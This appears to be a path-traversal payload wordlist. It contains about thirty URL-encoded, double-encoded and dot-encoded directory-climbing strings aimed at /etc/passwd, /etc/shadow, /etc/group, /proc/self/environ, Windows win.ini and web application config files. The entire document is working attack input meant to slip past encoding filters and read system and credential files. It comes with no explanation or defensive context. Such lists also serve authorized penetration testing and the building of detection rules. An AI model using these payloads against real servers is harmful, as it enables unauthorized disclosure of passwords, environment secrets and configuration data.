..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252fetc%252fshadow
..%252f..%252f..%252f..%252fetc%252fshadow
..%252f..%252f..%252fetc%252fgroup
..%252f..%252f..%252fetc%252fhosts
..%252f..%252f..%252fproc%252fself%252fenviron
..%252f..%252f..%252f..%252fproc%252fself%252fenviron
..%255c..%255c..%255cwindows%255cwin.ini
..%255c..%255c..%255c..%255cwindows%255cwin.ini
..%255c..%255c..%255c..%255c..%255cwindows%255cwin.ini
..%252f..%252f..%252fvar%252fwww%252fhtml%252findex.php
..%252f..%252f..%252f..%252fvar%252fwww%252fhtml%252fconfig.php
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%5c..%5c..%5cwindows%5cwin.ini
..%5c..%5c..%5c..%5cwindows%5cwin.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
